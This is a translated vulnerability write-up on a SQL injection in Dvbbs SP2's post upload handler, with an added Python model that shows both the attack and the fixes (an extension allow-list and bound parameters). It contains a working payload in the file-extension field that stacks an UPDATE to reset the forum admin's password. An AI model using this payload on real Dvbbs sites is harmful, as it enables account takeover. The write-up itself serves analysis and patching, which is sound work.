Reproducing the Dvbbs SP2 upload vulnerability: debunking the SP2 myth

Source: Internet
Author: User

Some time ago I heard that the online version's upload hole can still be exploited. Some people say upload.inc is at fault. I read that code N times and can say for certain that upload.inc offers no way in. Today I happened to visit the official Dvbbs (动网) site and looked carefully: the profile-edit upload had been changed but the post upload had not. upload.asp and post_upload.asp both include upload.inc, which proves that file is not the problem; it must be in post_upfile.asp. Open that file and read it once more!
At first glance:

If upload_ViewType <> 999 And F_Type = 1 Then
    Dvbbs.Execute("insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.boardID & "," & Dvbbs.userID & ",'" & Dvbbs.membername & "','" & Replace(rename, "|", "") & "','" & F_Viewname & "','" & Replace(FileExt, ".", "") & "'," & F_Type & "," & Filesize & ",4)")
Else
    Dvbbs.Execute("insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.boardID & "," & Dvbbs.userID & ",'" & Dvbbs.membername & "','" & Replace(rename, "|", "") & "','" & Replace(FileExt, ".", "") & "'," & F_Type & "," & Filesize & ",4)")
End If
Here is an SQL statement built by string concatenation. Could the so-called re-exploitation of the upload hole really be injection rather than upload? Let's go through every variable the user submits.
Dvbbs.boardID, Dvbbs.userID, Dvbbs.membername, F_Viewname, F_Type and Filesize are certainly fine. Let's look at the remaining variables and see where they come from.
The first, Replace(rename, "|", ""), strips the "|" from rename. Where does rename come from? rename = createPath & Filename & "|"
It is createPath joined to Filename with a "|" appended, and that "|" is stripped again later, so there is no need to worry about it. Now check createPath and Filename separately.
File_name = createName()
Filename = File_name & "." & FileExt    ' Filename is File_name joined to FileExt by a dot
Private Function createName()
    Dim ranNum
    Randomize
    ranNum = Int(999 * Rnd)
    createName = Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & ranNum
End Function
Obviously File_name is just the date and time with a random number appended; nothing to use there. The problem must lie with FileExt...
Hold that thought; let's look at the other places first.
createPath looks like this:
Private Function createPath()
    Dim objFSO, Fsofolder, uploadpath
    uploadpath = Year(Now) & "-" & Month(Now)    ' upload folder named by year and month, e.g. 2003-8
    On Error Resume Next
    Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    If objFSO.FolderExists(Server.MapPath(CheckFolder & uploadpath)) = False Then
        objFSO.CreateFolder Server.MapPath(CheckFolder & uploadpath)
    End If
    If Err.Number = 0 Then
        createPath = uploadpath & "/"
    Else
        createPath = ""
    End If
    Set objFSO = Nothing
End Function
createPath is built from uploadpath (year and month) with FSO, e.g. uploadfile/2004-11. Nothing to use here either.
Now the other variable, Replace(FileExt, ".", ""), which is the suspicious FileExt mentioned above. Let's trace its whole history and see whether it can be used.

Set File = upload.File(FormName)    ' create the file object
FileExt = FixName(File.FileExt)

This is where it first appears. Isn't File.FileExt simply the extension we submitted? Anyone who has uploaded files through Dvbbs knows that capturing the request and changing the extension is routine. So there is a door here; at least this is a place we control. FileExt = FixName(File.FileExt) passes it through FixName for filtering. Let's see what that function does.
Function FixName(UpFileExt)
    If IsEmpty(UpFileExt) Then Exit Function
    FixName = LCase(UpFileExt)
    FixName = Replace(FixName, Chr(0), "")
    FixName = Replace(FixName, ".", "")      ' haha, the dot is replaced with nothing; this is why the old upload trick no longer works on SP2
    FixName = Replace(FixName, "asp", "")    ' asp replaced with nothing
    FixName = Replace(FixName, "asa", "")    ' asa filtered
    FixName = Replace(FixName, "aspx", "")   ' aspx filtered (already reduced to "x" by the asp line above)
    FixName = Replace(FixName, "cer", "")    ' cer filtered
    FixName = Replace(FixName, "cdx", "")    ' cdx filtered
    FixName = Replace(FixName, "htr", "")    ' htr filtered
End Function
Haha, it only removes a few specific substrings. The characters we need for injection, single quotes, semicolons, commas and --, are not filtered at all; they pass straight through. The next step is to construct the statement. Look at its SQL again:

insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (" & Dvbbs.boardID & "," & Dvbbs.userID & ",'" & Dvbbs.membername & "','" & Replace(rename, "|", "") & "','" & F_Viewname & "','" & Replace(FileExt, ".", "") & "'," & F_Type & "," & Filesize & ",4)

After values come " & Dvbbs.boardID & "," & Dvbbs.userID & ",'" & Dvbbs.membername & ", all normal. Once we change FileExt, rename changes with it, so the Replace(FileExt, ".", "") further along can be ignored; we only need to construct rename. Look again at where rename comes from:
rename = createPath & Filename & "|"
File_name = createName()
Filename = File_name & "." & FileExt
createPath is a normal fixed string and can be ruled out; File_name is also a normal value, and the "." between it and the extension can be ignored; the "|" at the end is helpfully stripped for us. Suppose the statement is

insert into dv_upFile (F_BoardID, F_UserID, F_Username, F_Filename, F_Viewname, F_FileType, F_Type, F_FileSize, F_Flag) values (1, 1, 'user', 'uploadfile/2004-11/2324128374912.jpg', 'user', 'jpg', 1, 1000, 4)

That is a normal statement. The jpg in it is what we can change in the captured request (and in the local file's extension), so we turn jpg into a complete SQL statement of its own. For example, replace jpg with

jpg', 'user', 'jpg', 1, 1000, 4); update dv_admin set userpassword = '000000' where username = 'admin' -- jpg
One thing to note: F_Type is the detected file type. If it is 1 (an image), the first SQL statement above is executed; for anything else, the second one is. The code that decides this is

F_Type = CheckFiletype(FileExt)

and the CheckFiletype function looks like this:
Private Function CheckFiletype(FileExt)
    Dim upFiletype
    Dim FilePic, FileVedio, FileSoft, FileFlash, FileMusic
    FileExt = LCase(Replace(FileExt, ".", ""))
    Select Case LCase(FileExt)
        Case "gif", "jpg", "jpeg", "png", "bmp", "tif", "iff"
            CheckFiletype = 1
        Case "swf", "swi"
            CheckFiletype = 2
        Case "mid", "wav", "mp3", "rmi", "cda"
            CheckFiletype = 3
        Case "avi", "mpg", "mpeg", "ra", "ram", "wov", "asf"
            CheckFiletype = 4
        Case Else
            CheckFiletype = 0
    End Select
End Function
The FileExt variable, our extension, is used here too: all "." are removed, then the result is matched against the lists. An injected extension like the one above matches none of them, so CheckFiletype returns 0 and the second INSERT (the one without F_Viewname) is the statement that runs. The tail of the payload therefore has to be built for that statement, because the two statements have different shapes: drop the 'user' value and use type code 0, i.e. replace jpg with

jpg', 'jpg', 0, 1000, 4); update dv_admin set userpassword = '000000' where username = 'admin' --

Once that runs, the userpassword of admin in dv_admin has been changed to 000000. (If the column stores a hash rather than the plain password, the value written has to be the hash of the password you intend to log in with.)
If it is the Access version, things look harder: Jet will not execute multiple statements separated by a semicolon, there is no WHERE condition here to guess values through, and the VALUES list does not seem able to pull in other values with a SELECT; the only route would be an INSERT ... SELECT that brings a whole row back as a record and adds it separately. Is there a way to construct such perfect syntax? My SQL is not that strong, and I have not come up with a complete solution for the Access version yet.
The most important thing to say at the end is that every parameter that goes into an SQL statement must be strictly checked, or better, passed as a bound parameter rather than concatenated. The fix for this spot is to filter in FixName(); if you cannot patch, turn off the post upload function and wait for the official patch. :)
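The chain traced above (FixName, CheckFiletype, the two concatenated INSERTs and the branch the injected extension lands in) and the fix asked for in the closing paragraph, as an added Python model. This is example code written for this page, not Dvbbs code and not from the original article: the VBScript functions are re-implemented in Python, an in-memory SQLite database stands in for SQL Server (both accept ';'-stacked statements; Access does not, as noted above), and the table schema, upload-date path, file name, admin row and password value are all constructed for the demonstration. It also shows the two remedies: an allow-list check on the extension and parameter binding for the INSERT.

```python
"""Model of Dvbbs post_upfile.asp extension handling (added example, not Dvbbs code)."""
import re
import sqlite3

# Constructed schema standing in for the Dvbbs tables named in the article.
SCHEMA = """
create table dv_upFile (F_BoardID int, F_UserID int, F_Username text, F_Filename text,
    F_Viewname text, F_FileType text, F_Type int, F_FileSize int, F_Flag int);
create table dv_admin (username text, userpassword text);
"""

IMAGE = {"gif", "jpg", "jpeg", "png", "bmp", "tif", "iff"}
FLASH = {"swf", "swi"}
MUSIC = {"mid", "wav", "mp3", "rmi", "cda"}
VIDEO = {"avi", "mpg", "mpeg", "ra", "ram", "wov", "asf"}
ALLOWED_EXT = IMAGE | FLASH | MUSIC | VIDEO


def fix_name(up_file_ext):
    """Mirror of FixName(): lower-case, then delete NUL, '.', and a fixed list of
    substrings, in that order. Quotes, ';', ',' and '--' pass through untouched."""
    s = up_file_ext.lower()
    for bad in ("\x00", ".", "asp", "asa", "aspx", "cer", "cdx", "htr"):
        s = s.replace(bad, "")
    return s


def check_file_type(file_ext):
    """Mirror of CheckFiletype(): 1-4 for known media extensions, else 0."""
    ext = file_ext.lower().replace(".", "")
    for code, group in ((1, IMAGE), (2, FLASH), (3, MUSIC), (4, VIDEO)):
        if ext in group:
            return code
    return 0


def build_insert(board_id, user_id, member_name, file_ext, viewname, filesize,
                 create_path="2004-11/", file_name="20041112345678"):
    """Mirror of the two string-concatenated INSERTs (upload_ViewType <> 999).
    create_path and file_name are constructed stand-ins for createPath()/createName()."""
    f_type = check_file_type(file_ext)
    rename = (create_path + file_name + "." + file_ext + "|").replace("|", "")
    ftype_col = file_ext.replace(".", "")
    if f_type == 1:  # image: 9-column statement with F_Viewname
        return ("insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,F_Viewname,"
                "F_FileType,F_Type,F_FileSize,F_Flag) values ("
                f"{board_id},{user_id},'{member_name}','{rename}','{viewname}',"
                f"'{ftype_col}',{f_type},{filesize},4)")
    # anything else: 8-column statement without F_Viewname
    return ("insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,"
            "F_FileType,F_Type,F_FileSize,F_Flag) values ("
            f"{board_id},{user_id},'{member_name}','{rename}',"
            f"'{ftype_col}',{f_type},{filesize},4)")


# Constructed extension for the multipart field. It contains no '.', no
# asp/asa/cer/cdx/htr, so fix_name() leaves it intact. check_file_type() returns 0
# for it, so the 8-column branch runs: the payload closes F_Filename, supplies the
# remaining five values, stacks an UPDATE and comments out the original tail.
PAYLOAD_EXT = ("jpg','jpg',0,1000,4);"
               "update dv_admin set userpassword='000000' where username='admin'--")


def injected_statement():
    return build_insert(1, 1, "user", fix_name(PAYLOAD_EXT), "user", 1000)


def _fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("insert into dv_admin values ('admin', 'original')")  # constructed row
    return conn


def _admin_password(conn):
    return conn.execute("select userpassword from dv_admin where username='admin'").fetchone()[0]


def exploit_demo():
    """Run the concatenated statement as the ASP does (executescript() stands in for
    SQL Server accepting stacked statements); return admin password before/after."""
    conn = _fresh_db()
    before = _admin_password(conn)
    conn.executescript(injected_statement())
    return before, _admin_password(conn)


def safe_extension(up_file_ext):
    """Allow-list replacement for FixName(): accept exactly one known extension
    token, otherwise reject the upload (None)."""
    ext = up_file_ext.lower().lstrip(".")
    if re.fullmatch(r"[a-z0-9]{1,5}", ext) and ext in ALLOWED_EXT:
        return ext
    return None


def parameterized_demo():
    """Same INSERT with bound parameters (ADODB.Command parameters play this role in
    ASP): the payload is stored as data in F_Filename and admin is untouched."""
    conn = _fresh_db()
    ext = fix_name(PAYLOAD_EXT)
    conn.execute(
        "insert into dv_upFile (F_BoardID,F_UserID,F_Username,F_Filename,"
        "F_FileType,F_Type,F_FileSize,F_Flag) values (?,?,?,?,?,?,?,?)",
        (1, 1, "user", "2004-11/20041112345678." + ext, ext, check_file_type(ext), 1000, 4))
    stored = conn.execute("select F_Filename from dv_upFile").fetchone()[0]
    return _admin_password(conn), stored


if __name__ == "__main__":
    print(injected_statement())
    print("exploit:", exploit_demo())
    print("allow-list:", safe_extension(PAYLOAD_EXT), safe_extension("JPG"))
    print("parameters:", parameterized_demo())
```

Running it prints the full stacked statement, then ('original', '000000') for the concatenated version and ('original', ...) for the parameterized one. The allow-list alone would already have rejected the payload, but binding the values is what removes the class of bug: with parameters, whatever survives FixName is just a string in F_Filename.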
